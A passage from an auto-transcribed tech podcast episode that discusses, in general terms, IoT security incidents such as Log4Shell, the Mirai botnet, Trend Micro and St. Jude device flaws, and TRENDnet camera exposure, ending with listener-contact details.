00:21:46,160 Speaker 1: their own systems because log for jays used so widely, 335 00:21:46,920 --> 00:21:49,840 Speaker 1: and maybe that's why they were thinking, well, because you 336 00:21:49,920 --> 00:21:53,600 Speaker 1: told them, now there's this window where attackers could attack 337 00:21:53,600 --> 00:21:57,560 Speaker 1: our systems. Or maybe it was implying that the Chinese 338 00:21:57,600 --> 00:22:00,960 Speaker 1: government would have preferred to keep the vulnerability secret and 339 00:22:01,000 --> 00:22:06,119 Speaker 1: potentially use it as an exploit themselves. But whatever the 340 00:22:06,200 --> 00:22:10,440 Speaker 1: log for J tool was is used all over the world, 341 00:22:10,520 --> 00:22:15,119 Speaker 1: and this vulnerability affected any system that used the specific 342 00:22:15,240 --> 00:22:18,920 Speaker 1: versions of log for J that contained this vulnerability, even 343 00:22:18,960 --> 00:22:21,159 Speaker 1: if those systems were just using log for J to 344 00:22:21,320 --> 00:22:25,520 Speaker 1: log errors so that technicians could diagnose system problems. Anyway, 345 00:22:25,560 --> 00:22:28,000 Speaker 1: once word got out, there was a scramble to patch 346 00:22:28,119 --> 00:22:31,040 Speaker 1: systems that were using affected versions of log for J. 347 00:22:31,720 --> 00:22:34,800 Speaker 1: And if you were tuned into network security late in 348 00:22:35,640 --> 00:22:38,719 Speaker 1: one and early in two, you probably heard about the 349 00:22:38,800 --> 00:22:41,440 Speaker 1: log shell exploit. That was the exploit that would allow 350 00:22:41,480 --> 00:22:46,840 Speaker 1: someone to penetrate a system by exploiting this vulnerability, uh 351 00:22:46,880 --> 00:22:50,919 Speaker 1: and haven't run whatever code they wanted. And it was 352 00:22:51,000 --> 00:22:55,080 Speaker 1: and is a huge issue. In fact, hackers have exploited 353 00:22:55,080 --> 00:22:58,760 Speaker 1: the logshell vulnerability to create boton nets. Early ones included 354 00:22:59,000 --> 00:23:05,000 Speaker 1: where one called Marai, which was perpetuated in various ways, 355 00:23:05,000 --> 00:23:07,480 Speaker 1: but the log four J exploit was a big one, 356 00:23:07,720 --> 00:23:10,960 Speaker 1: and another one called mush Stick. And when we come back, 357 00:23:10,960 --> 00:23:13,639 Speaker 1: I'm gonna talk a little bit more about Marai, plus 358 00:23:13,680 --> 00:23:18,320 Speaker 1: some other some other IoT vulnerability issues that we've seen. 359 00:23:18,920 --> 00:23:32,119 Speaker 1: But first let's take another quick break. So back in 360 00:23:33,480 --> 00:23:37,639 Speaker 1: the Marai boton net consisted of thousands of IoT devices 361 00:23:38,040 --> 00:23:41,320 Speaker 1: and it was perpetuated in a couple of different ways, 362 00:23:41,359 --> 00:23:45,440 Speaker 1: and one of them was through malware. And when a 363 00:23:45,480 --> 00:23:49,080 Speaker 1: computer got infected by this particular kind of malware, it 364 00:23:49,080 --> 00:23:53,600 Speaker 1: would immediately start a search for IoT devices that could 365 00:23:53,600 --> 00:23:57,400 Speaker 1: also be infected and added to the button net. So 366 00:23:57,880 --> 00:24:01,920 Speaker 1: one it was essentially doing was making a computer detect 367 00:24:02,000 --> 00:24:05,239 Speaker 1: IoT devices and then use the default user names and 368 00:24:05,320 --> 00:24:09,360 Speaker 1: passwords that manufacturers had set for these devices to try 369 00:24:09,359 --> 00:24:12,399 Speaker 1: and add them to the button net. And because it 370 00:24:12,440 --> 00:24:16,439 Speaker 1: can sometimes be impossible to change the default log in credentials, 371 00:24:16,440 --> 00:24:19,520 Speaker 1: like there just isn't away at least not an easy 372 00:24:19,560 --> 00:24:22,600 Speaker 1: way for the average person to make those changes, or 373 00:24:23,000 --> 00:24:24,800 Speaker 1: a lot of people just don't bother to do it 374 00:24:24,840 --> 00:24:27,879 Speaker 1: even if there is a way to make those changes. 375 00:24:28,800 --> 00:24:32,560 Speaker 1: That meant that these devices were readily available to be 376 00:24:32,600 --> 00:24:36,840 Speaker 1: added to button nets, and uh, stuff like DVR players 377 00:24:37,160 --> 00:24:41,480 Speaker 1: were compromised and joined this bottonet army and the botton 378 00:24:41,520 --> 00:24:44,399 Speaker 1: at the Murai Bottonet launched a massive de dos attack 379 00:24:44,400 --> 00:24:47,920 Speaker 1: in you might even remember it. This was the one 380 00:24:48,080 --> 00:24:53,120 Speaker 1: that that did some pretty big damage. Not I guess 381 00:24:53,160 --> 00:24:55,719 Speaker 1: damage is the wrong word, but it definitely brought stuff 382 00:24:55,760 --> 00:25:03,160 Speaker 1: down for several hours. So that included service is like Reddit, Twitter, Netflix. 383 00:25:04,080 --> 00:25:07,600 Speaker 1: Outlets like CNN and The Guardian were affected, among others. 384 00:25:08,359 --> 00:25:11,520 Speaker 1: According to a ten networks, the hacker group Charming Kitten 385 00:25:11,600 --> 00:25:16,240 Speaker 1: out of Iran leaned on the logshell log for J 386 00:25:16,440 --> 00:25:18,840 Speaker 1: exploit we were talking about before the break. They used 387 00:25:18,840 --> 00:25:22,520 Speaker 1: that same exploit to launch attacks against Israeli servers, including 388 00:25:22,560 --> 00:25:26,199 Speaker 1: ones belonging to the Israeli government. And while companies have 389 00:25:26,280 --> 00:25:29,800 Speaker 1: been rolling out patches to their products that feature log 390 00:25:29,920 --> 00:25:33,960 Speaker 1: for J, the fact that this was a widely dispersed 391 00:25:33,960 --> 00:25:37,520 Speaker 1: tool and library set means it's very tricky to resolve. 392 00:25:38,440 --> 00:25:42,199 Speaker 1: Like imagine it's it's something that's been spread throughout the 393 00:25:42,240 --> 00:25:45,719 Speaker 1: world and then years later you find out, oh, shoot, 394 00:25:46,480 --> 00:25:49,160 Speaker 1: it's got this fatal flaw in it that we didn't 395 00:25:49,240 --> 00:25:52,440 Speaker 1: know about and everybody's got one. Now, how do you 396 00:25:52,480 --> 00:25:56,440 Speaker 1: get the message out so that anyone affected can take 397 00:25:56,480 --> 00:25:59,159 Speaker 1: steps to get rid of that thing. That's kind of 398 00:25:59,160 --> 00:26:01,960 Speaker 1: where we are now. I mean it's the big companies 399 00:26:02,080 --> 00:26:05,880 Speaker 1: started rushing out patches right away. Uh, And these were 400 00:26:05,880 --> 00:26:08,439 Speaker 1: companies that had built log for J into lots and 401 00:26:08,480 --> 00:26:12,879 Speaker 1: lots of different products, but smaller companies may still be 402 00:26:12,920 --> 00:26:15,879 Speaker 1: struggling to fix that. And you know, it's it's just 403 00:26:15,920 --> 00:26:18,480 Speaker 1: a it's just a tough situation. I liken it to 404 00:26:18,560 --> 00:26:22,760 Speaker 1: being aboard an enormous ship that has thousands of tiny 405 00:26:23,080 --> 00:26:26,959 Speaker 1: holes in the hull. You you're patching holes and patching 406 00:26:26,960 --> 00:26:31,359 Speaker 1: holes and patching holes, and there always seems to be more. Uh, 407 00:26:31,520 --> 00:26:34,800 Speaker 1: that's kind of where we're at now. And in case 408 00:26:34,840 --> 00:26:38,280 Speaker 1: you're wondering, like the compromise systems, some of them are 409 00:26:39,000 --> 00:26:41,639 Speaker 1: engaged in these sort of de dos botan net boton 410 00:26:41,640 --> 00:26:44,280 Speaker 1: net attacks, and some of them are being put to 411 00:26:45,080 --> 00:26:50,639 Speaker 1: you know, mine cryptocurrency. So yeah, fun times. While there 412 00:26:50,640 --> 00:26:53,439 Speaker 1: are steps that companies and even network administrators can go 413 00:26:53,520 --> 00:26:56,159 Speaker 1: through to help eliminate risk with log for J, it 414 00:26:56,200 --> 00:26:58,920 Speaker 1: requires a lot of effort. And for any systems out 415 00:26:58,960 --> 00:27:01,119 Speaker 1: there that are orphaned or that are part of the 416 00:27:01,280 --> 00:27:04,400 Speaker 1: organization that just lacks the resources to address problems like this, 417 00:27:05,080 --> 00:27:08,560 Speaker 1: it means there remains vulnerable points within various systems and 418 00:27:08,560 --> 00:27:11,600 Speaker 1: hackers will continue to probe for them. But let's talk 419 00:27:11,640 --> 00:27:14,560 Speaker 1: about an IoT device that made it was made to 420 00:27:14,600 --> 00:27:17,679 Speaker 1: give you greater security, but in fact it brought with 421 00:27:17,720 --> 00:27:21,639 Speaker 1: it a big security vulnerability. So a company called trend 422 00:27:21,680 --> 00:27:26,320 Speaker 1: Micro has a product called the Home Network Security Station. 423 00:27:27,119 --> 00:27:29,919 Speaker 1: This device connects to home routers and what it's what 424 00:27:29,960 --> 00:27:33,280 Speaker 1: it's supposed to do is scan for activity. It's supposed 425 00:27:33,280 --> 00:27:37,320 Speaker 1: to alert you to any possible network intrusions. So, in 426 00:27:37,400 --> 00:27:39,919 Speaker 1: other words, if someone is trying to gain unauthorized access 427 00:27:39,920 --> 00:27:41,920 Speaker 1: to your network, it's supposed to give you an alert. 428 00:27:42,280 --> 00:27:45,240 Speaker 1: Supposed to give you a centralized point where you can 429 00:27:45,359 --> 00:27:49,119 Speaker 1: change access settings on network devices so you can, you know, 430 00:27:49,160 --> 00:27:52,000 Speaker 1: like revoke permissions for devices so that they can no 431 00:27:52,080 --> 00:27:54,320 Speaker 1: longer access your network. That kind of stuff, which is 432 00:27:54,600 --> 00:27:59,480 Speaker 1: legit a useful tool to have in your arsenal. However, 433 00:28:00,600 --> 00:28:04,000 Speaker 1: when they first started shipping this product, it had some 434 00:28:04,080 --> 00:28:07,920 Speaker 1: bugs in it that created potential attack vectors. Some researchers 435 00:28:07,920 --> 00:28:11,880 Speaker 1: at Cisco Talos uncovered these problems. There were three of them, 436 00:28:12,080 --> 00:28:15,600 Speaker 1: so one was the one of the components inside the 437 00:28:15,680 --> 00:28:19,800 Speaker 1: device used a hard coded password. And and as that 438 00:28:19,800 --> 00:28:23,000 Speaker 1: phrase suggests, this is when you've got a predetermined password 439 00:28:23,040 --> 00:28:27,760 Speaker 1: that's hard coded into a system at some level. And 440 00:28:28,240 --> 00:28:31,200 Speaker 1: you know, systems are made up of lots of different components. 441 00:28:31,280 --> 00:28:35,240 Speaker 1: Sometimes just an individual component can have a hard coded password, 442 00:28:35,280 --> 00:28:37,960 Speaker 1: and that alone can be a vulnerability because if a 443 00:28:37,960 --> 00:28:41,760 Speaker 1: hacker knows or can guess that hard coded password, they 444 00:28:41,760 --> 00:28:47,240 Speaker 1: can potentially first exploit that component and then perhaps escalate 445 00:28:47,320 --> 00:28:51,960 Speaker 1: that into getting control of more of the system. This 446 00:28:52,040 --> 00:28:56,120 Speaker 1: process of a hacker establishing an attack point and then 447 00:28:56,240 --> 00:29:00,520 Speaker 1: using that to gain more purchase is called privilege s scalation. 448 00:29:00,800 --> 00:29:04,120 Speaker 1: In network security settings. The goal is to obtain the 449 00:29:04,200 --> 00:29:08,680 Speaker 1: highest level of access across the broadest spectrum of systems 450 00:29:08,720 --> 00:29:12,280 Speaker 1: that you can, and it all starts somewhere, including these 451 00:29:12,280 --> 00:29:16,360 Speaker 1: smaller components that have a hard coded password associated with them. This, 452 00:29:16,480 --> 00:29:18,920 Speaker 1: by the way, is why it is a good idea 453 00:29:19,000 --> 00:29:22,200 Speaker 1: to change your default password on your various devices if 454 00:29:22,240 --> 00:29:25,960 Speaker 1: you can, because there are hackers out there who just 455 00:29:26,040 --> 00:29:31,360 Speaker 1: maintain enormous databases of log in credentials for lots of 456 00:29:31,400 --> 00:29:35,720 Speaker 1: different components network components. Anyway, the researchers at Cisco tell 457 00:29:35,800 --> 00:29:38,840 Speaker 1: Us found, in addition to the hard coded password to 458 00:29:38,960 --> 00:29:43,400 Speaker 1: other vulnerabilities that allowed for this privilege escalation. Uh and 459 00:29:45,120 --> 00:29:51,320 Speaker 1: together that just marked a real bad vulnerability. But Cisco 460 00:29:51,360 --> 00:29:54,920 Speaker 1: tell Us researchers alerted trend Micro. Trend Micro were able 461 00:29:55,000 --> 00:29:58,920 Speaker 1: to send out an update to connected systems that helped 462 00:29:59,000 --> 00:30:01,680 Speaker 1: fix that problem, so they were able to patch out 463 00:30:01,680 --> 00:30:04,600 Speaker 1: those vulnerabilities. And the good news is that while the 464 00:30:04,640 --> 00:30:08,480 Speaker 1: vulnerability could have potentially handed hackers access to affecting systems, 465 00:30:09,240 --> 00:30:13,000 Speaker 1: there were no attacks found in the wild. So it 466 00:30:13,040 --> 00:30:18,560 Speaker 1: looks like this vulnerability was found and uh and mitigated 467 00:30:19,080 --> 00:30:22,960 Speaker 1: without anyone in the hacker group being aware of it, 468 00:30:23,200 --> 00:30:25,239 Speaker 1: so no one was able to take advantage of it 469 00:30:25,320 --> 00:30:28,400 Speaker 1: before that door was shut. So that's a good good 470 00:30:28,480 --> 00:30:31,400 Speaker 1: story there. All right, Well, that's an example of an 471 00:30:31,440 --> 00:30:34,760 Speaker 1: IoT device meant to secure your network and the device 472 00:30:34,800 --> 00:30:37,400 Speaker 1: itself ends up having vulnerabilities in it. But what a 473 00:30:37,480 --> 00:30:41,240 Speaker 1: valut device that's meant to just keep you alive. That's 474 00:30:41,240 --> 00:30:45,480 Speaker 1: a big old yikes. And yeah, back in CNN reported 475 00:30:45,480 --> 00:30:50,160 Speaker 1: that the FDA discovered that implantable cardiac devices from St. 476 00:30:50,240 --> 00:30:54,680 Speaker 1: Jude's Medical had some vulnerabilities in them, and that means 477 00:30:54,720 --> 00:30:58,680 Speaker 1: that devices that are intended to stimulate a person's heart 478 00:30:58,760 --> 00:31:03,040 Speaker 1: so that it continues beating could possibly be hacked. And 479 00:31:03,080 --> 00:31:05,640 Speaker 1: this is kind of getting into like science fiction dystopian 480 00:31:05,760 --> 00:31:10,280 Speaker 1: horror story territory here. The f d A said that 481 00:31:10,320 --> 00:31:13,360 Speaker 1: a hacker could use a transmitter that would normally perform 482 00:31:13,400 --> 00:31:16,080 Speaker 1: a scan of cardiac devices and it was intended to 483 00:31:16,080 --> 00:31:19,600 Speaker 1: give physicians information about how a patient is doing remotely, 484 00:31:20,560 --> 00:31:24,800 Speaker 1: but instead the hacker could use that transmitter to potentially 485 00:31:25,160 --> 00:31:30,480 Speaker 1: drain at cardiac implants battery or change the pace of stimulation, 486 00:31:30,520 --> 00:31:34,920 Speaker 1: which could obviously lead to disastrous results. St. Jude Medical 487 00:31:35,000 --> 00:31:38,760 Speaker 1: swiftly got to work patching the vulnerabilities, so they fixed 488 00:31:38,800 --> 00:31:41,840 Speaker 1: the problem. But when you're talking about devices, especially ones 489 00:31:41,880 --> 00:31:45,760 Speaker 1: that have already been implanted in patients. These are devices 490 00:31:45,760 --> 00:31:50,600 Speaker 1: that are meant to help keep people having a healthy life, well, 491 00:31:50,600 --> 00:31:54,760 Speaker 1: stuff gets complicated. You can't just push out a firmware 492 00:31:54,840 --> 00:31:57,840 Speaker 1: update to someone's heart you know, if you have to 493 00:31:58,400 --> 00:32:01,720 Speaker 1: reboot your router at our firmware update, that's usually not 494 00:32:01,760 --> 00:32:05,040 Speaker 1: a big deal that most it's a minor inconvenience, But 495 00:32:05,320 --> 00:32:09,040 Speaker 1: when you're talking about a device that regulates heartbeat, well, 496 00:32:09,080 --> 00:32:12,360 Speaker 1: implementing a patch could cause an interruption of service, and 497 00:32:12,400 --> 00:32:15,719 Speaker 1: in this case, that service can be critical to that end. 498 00:32:15,760 --> 00:32:22,120 Speaker 1: Officials were urging caution to physicians before they installed patches 499 00:32:22,200 --> 00:32:27,920 Speaker 1: to patient cardiac implants because there's a risk that something 500 00:32:27,920 --> 00:32:30,720 Speaker 1: could go wrong in that process, including the loss of 501 00:32:30,760 --> 00:32:34,120 Speaker 1: functionality from the device, and that's clearly not what you 502 00:32:34,120 --> 00:32:36,880 Speaker 1: don't want to create, and a medical emergency while you're 503 00:32:36,880 --> 00:32:41,480 Speaker 1: trying to prevent a hypothetical future one. So yeah, that 504 00:32:41,600 --> 00:32:47,000 Speaker 1: was a really bad instance of vulnerabilities. It's legitimately terrifying, 505 00:32:47,040 --> 00:32:49,360 Speaker 1: and it reminds us that while the Internet of things 506 00:32:49,480 --> 00:32:53,120 Speaker 1: vision has undeniable benefits, I mean, even in that case, 507 00:32:53,200 --> 00:32:56,800 Speaker 1: right a physician being able to monitor patients remotely, that's incredible. 508 00:32:57,800 --> 00:33:02,080 Speaker 1: It could mean the difference between someone suffering a cardiac 509 00:33:02,120 --> 00:33:06,640 Speaker 1: event and having it prevented, and that has a tremendous 510 00:33:06,720 --> 00:33:10,120 Speaker 1: effect on that person's quality of life. So that is 511 00:33:10,200 --> 00:33:13,000 Speaker 1: something to be wished for. That is something we should 512 00:33:13,000 --> 00:33:15,720 Speaker 1: strive for. But we also have to keep in mind 513 00:33:15,840 --> 00:33:19,080 Speaker 1: that whenever we're talking about connectivity, there are risks that 514 00:33:19,160 --> 00:33:22,560 Speaker 1: come with that, and it means that we need to 515 00:33:23,360 --> 00:33:28,760 Speaker 1: really search out vulnerabilities in these products before they get 516 00:33:28,760 --> 00:33:31,120 Speaker 1: to the shipping process, which is easier than than done. 517 00:33:31,240 --> 00:33:36,600 Speaker 1: Companies have limited resources, it is very difficult to suss 518 00:33:36,640 --> 00:33:41,800 Speaker 1: out any and all vulnerabilities uh in some cases, and 519 00:33:41,840 --> 00:33:43,760 Speaker 1: when it's released to the world, then you've got the 520 00:33:43,880 --> 00:33:46,880 Speaker 1: resources of the entire world that could potentially look into 521 00:33:47,440 --> 00:33:50,120 Speaker 1: a product and find vulnerability. So I don't want to 522 00:33:50,120 --> 00:33:54,680 Speaker 1: put a lot of blame and unfair burden on companies 523 00:33:54,680 --> 00:33:57,320 Speaker 1: that have released things that have had vulnerabilities in them. 524 00:33:57,920 --> 00:34:00,000 Speaker 1: In some cases, it's not even their fault. It's because 525 00:34:00,000 --> 00:34:04,239 Speaker 1: as they incorporated a component that for that came from 526 00:34:04,280 --> 00:34:08,399 Speaker 1: a different company, and that O. E. M company had 527 00:34:08,600 --> 00:34:11,719 Speaker 1: was the source of a vulnerability. But no matter what 528 00:34:12,239 --> 00:34:15,359 Speaker 1: blame you want to place, the end result is that 529 00:34:15,480 --> 00:34:18,120 Speaker 1: we need to be able to identify these quickly and 530 00:34:18,160 --> 00:34:23,279 Speaker 1: address them and preferably prevent them from ever getting out there, 531 00:34:23,320 --> 00:34:26,920 Speaker 1: and making sure that the shipped product is as secure 532 00:34:26,960 --> 00:34:30,480 Speaker 1: as possible so that we can enjoy those benefits without 533 00:34:30,520 --> 00:34:35,359 Speaker 1: the risk of these security vulnerabilities. Um, there's some other 534 00:34:35,440 --> 00:34:38,400 Speaker 1: examples we can talk about. You know. There was the 535 00:34:38,480 --> 00:34:43,600 Speaker 1: example of hackers getting access to IoT devices with trend Net. 536 00:34:43,880 --> 00:34:47,120 Speaker 1: This was a company that produces internet connected security systems. 537 00:34:47,120 --> 00:34:51,839 Speaker 1: Ironically enough, UH, they had this one webcam that they 538 00:34:51,840 --> 00:34:56,439 Speaker 1: were UH marketing over in the early twenty tens. UM 539 00:34:56,640 --> 00:34:59,080 Speaker 1: they were marketing it as either a home security system 540 00:34:59,239 --> 00:35:01,600 Speaker 1: or a baby mon The ring system but there was 541 00:35:01,640 --> 00:35:06,440 Speaker 1: a major problem, and that was like essentially between twelve 542 00:35:06,520 --> 00:35:11,399 Speaker 1: these specific web based cameras would allow anyone who had 543 00:35:11,440 --> 00:35:14,400 Speaker 1: the IP address for that camera to look at the feed. 544 00:35:15,120 --> 00:35:17,320 Speaker 1: So that's it. All you needed was the IP address. 545 00:35:17,640 --> 00:35:20,880 Speaker 1: If you had the IP address, you could see whatever 546 00:35:20,920 --> 00:35:25,800 Speaker 1: that camera could see. And that enormous invasion of privacy. 547 00:35:25,880 --> 00:35:29,880 Speaker 1: Right if someone gets hold of of that IP address 548 00:35:29,960 --> 00:35:33,840 Speaker 1: and they wouldn't normally have access to the camera, that's 549 00:35:34,239 --> 00:35:38,960 Speaker 1: phenomenally bad. Right. But then also trend neet was had 550 00:35:39,000 --> 00:35:41,759 Speaker 1: a really bad habit of doing things like transmitting user 551 00:35:41,840 --> 00:35:45,120 Speaker 1: log in credentials in plain text over the Internet, which 552 00:35:45,120 --> 00:35:49,719 Speaker 1: means anyone snooping on any of that communication would see 553 00:35:50,360 --> 00:35:54,080 Speaker 1: plain text log in credentials. Not not a secure way 554 00:35:54,120 --> 00:35:58,399 Speaker 1: of doing things. Um, the FTC brought an enforcement at 555 00:35:58,480 --> 00:36:02,760 Speaker 1: action against trend net. The company paid out a settlement 556 00:36:02,840 --> 00:36:06,799 Speaker 1: the following year, and trend net still operates to this day. 557 00:36:06,800 --> 00:36:09,640 Speaker 1: But now they take the steps to mask all these 558 00:36:09,680 --> 00:36:15,960 Speaker 1: things so that they are not uh these massive security vulnerabilities. 559 00:36:16,160 --> 00:36:19,120 Speaker 1: So they did take steps to address those problems and 560 00:36:19,160 --> 00:36:21,920 Speaker 1: fix them in the future. But this is the sort 561 00:36:21,960 --> 00:36:23,680 Speaker 1: of stuff we have to be aware of, you know, 562 00:36:23,800 --> 00:36:27,400 Speaker 1: anytime you wanna think about smart systems, whether you're talking 563 00:36:27,480 --> 00:36:31,279 Speaker 1: about your home or an office, or you're looking at 564 00:36:31,560 --> 00:36:36,360 Speaker 1: smart connected vehicles, it's good to do the research to 565 00:36:36,480 --> 00:36:40,120 Speaker 1: look into things like, what does the security community say 566 00:36:40,120 --> 00:36:44,640 Speaker 1: about this stuff? Are there any alerts about it? Should 567 00:36:44,640 --> 00:36:47,920 Speaker 1: I be concerned before I connected? If there are things 568 00:36:47,960 --> 00:36:51,880 Speaker 1: like log in credentials or or network access features I 569 00:36:51,920 --> 00:36:54,480 Speaker 1: need to know about? Are there steps I need to 570 00:36:54,520 --> 00:36:57,759 Speaker 1: take in order to change default passwords? These are all 571 00:36:57,800 --> 00:37:00,320 Speaker 1: important steps. And I know it sounds like a lot, 572 00:37:00,360 --> 00:37:02,479 Speaker 1: and I know it also may sound like, well, what's 573 00:37:02,520 --> 00:37:05,560 Speaker 1: the likelihood that I'm going to be targeted? But if 574 00:37:05,560 --> 00:37:09,759 Speaker 1: we look back to that Marai example, the Marai malware 575 00:37:09,840 --> 00:37:13,879 Speaker 1: and bought net that was you know, that doesn't mean 576 00:37:13,880 --> 00:37:17,200 Speaker 1: that you were a target in a hacker's eye. It's 577 00:37:17,200 --> 00:37:20,239 Speaker 1: not like the hacker saw you and said, oh, I'm 578 00:37:20,239 --> 00:37:24,560 Speaker 1: gonna see if this person's network security is up to speed. 579 00:37:25,680 --> 00:37:29,680 Speaker 1: That was a malware that was automatically making computer scan 580 00:37:29,840 --> 00:37:33,560 Speaker 1: for other devices that could potentially be compromised. When you've 581 00:37:33,600 --> 00:37:36,839 Speaker 1: automated that and you've created a malware that spreads this 582 00:37:36,880 --> 00:37:43,200 Speaker 1: way where it gets increasingly more powerful and more um 583 00:37:44,120 --> 00:37:48,120 Speaker 1: prevalent in an area. You don't need to be anyone 584 00:37:48,200 --> 00:37:52,239 Speaker 1: special to get targeted. It just can happen. So it's 585 00:37:52,280 --> 00:37:55,000 Speaker 1: important to keep all that in mind whenever we're thinking 586 00:37:55,000 --> 00:37:58,520 Speaker 1: about the Internet of Things. I really like the vision 587 00:37:58,560 --> 00:38:00,800 Speaker 1: of the Internet of Things. I like the ential benefits, 588 00:38:01,520 --> 00:38:08,440 Speaker 1: but I also worry about rushing into implementations without properly 589 00:38:08,520 --> 00:38:13,680 Speaker 1: giving security and privacy a lot of consideration. Okay, that 590 00:38:13,760 --> 00:38:17,560 Speaker 1: wraps up this episode of tech Stuff. That's the show 591 00:38:17,600 --> 00:38:20,239 Speaker 1: I'm doing right now, right, yes, tech Stuff. If you 592 00:38:20,360 --> 00:38:24,080 Speaker 1: have suggestions for future topics or questions or anything like that. 593 00:38:24,320 --> 00:38:25,919 Speaker 1: A couple of different ways you can get in touch 594 00:38:25,960 --> 00:38:30,080 Speaker 1: with me. One is to download the I Heart radio app. 595 00:38:30,120 --> 00:38:32,440 Speaker 1: It's free to downloads free to use. You can navigate 596 00:38:32,480 --> 00:38:34,439 Speaker 1: over to tech Stuff by typing that into the little 597 00:38:34,440 --> 00:38:37,439 Speaker 1: search engine. Pop on over to the podcast page. You'll 598 00:38:37,440 --> 00:38:40,560 Speaker 1: see that there is a microphone icon. If you hold 599 00:38:40,560 --> 00:38:42,840 Speaker 1: that down, you can leave a message up to thirty 600 00:38:42,840 --> 00:38:45,359 Speaker 1: seconds in length and let me know if you would 601 00:38:45,400 --> 00:38:47,279 Speaker 1: like me to play it in a future episode. I 602 00:38:47,280 --> 00:38:49,200 Speaker 1: don't have to, I'll only play it if you tell 603 00:38:49,200 --> 00:38:51,800 Speaker 1: me to. Uh. But yeah, that's one way to ask questions. 604 00:38:51,800 --> 00:38:54,480 Speaker 1: Another is to go on Twitter. The handle for the 605 00:38:54,520 --> 00:38:57,680 Speaker 1: show is tech Stuff hs W, so you can use 606 00:38:57,719 --> 00:38:59,560 Speaker 1: that to get in touch with me. A couple of 607 00:38:59,600 --> 00:39:02,920 Speaker 1: you have been asking if I'm on Mastodon for tech Stuff. 608 00:39:02,960 --> 00:39:06,040 Speaker 1: I am not not yet, but I will be looking 609 00:39:06,080 --> 00:39:10,239 Speaker 1: into that this week to see if I can use 610 00:39:10,280 --> 00:39:13,000 Speaker 1: that as another way of contact me. One last thing, 611 00:39:13,520 --> 00:39:17,239 Speaker 1: On Wednesday, we will be playing an episode of The 612 00:39:17,280 --> 00:39:20,160 Speaker 1: Restless Ones here in the tech Stuff feed. The Restless 613 00:39:20,200 --> 00:39:23,160 Speaker 1: Ones is an interview show that I host where I 614 00:39:23,200 --> 00:39:28,800 Speaker 1: talked to leaders in technology departments in big companies and 615 00:39:29,160 --> 00:39:33,960 Speaker 1: UM it's a it's a fun show about leadership and 616 00:39:34,160 --> 00:39:39,279 Speaker 1: technology and UH and the benefits of UH networks. So 617 00:39:40,560 --> 00:39:44,319 Speaker 1: I hope you will enjoy that, and I just wanted 618 00:39:44,320 --> 00:39:45,680 Speaker 1: to give a shout out so that way you're not 619 00:39:45,760 --> 00:39:48,920 Speaker 1: surprised when it happens on Wednesday. It's totally planned, supposed 620 00:39:48,960 --> 00:39:52,960 Speaker 1: to happen. That's it. I hope you're having a great 621 00:39:53,080 --> 00:39:55,279 Speaker 1: start to your week so far, and I'll talk to 622 00:39:55,320 --> 00:40:04,200 Speaker 1: you again really soon. Text Stuff is an I Heart 623 00:40:04,320 --> 00:40:08,040 Speaker 1: Radio production. For more podcasts from I Heart Radio, visit 624 00:40:08,080 --> 00:40:11,160 Speaker 1: the i Heart Radio app, Apple Podcasts, or wherever you 625 00:40:11,239 --> 00:40:12,600 Speaker 1: listen to your favorite shows.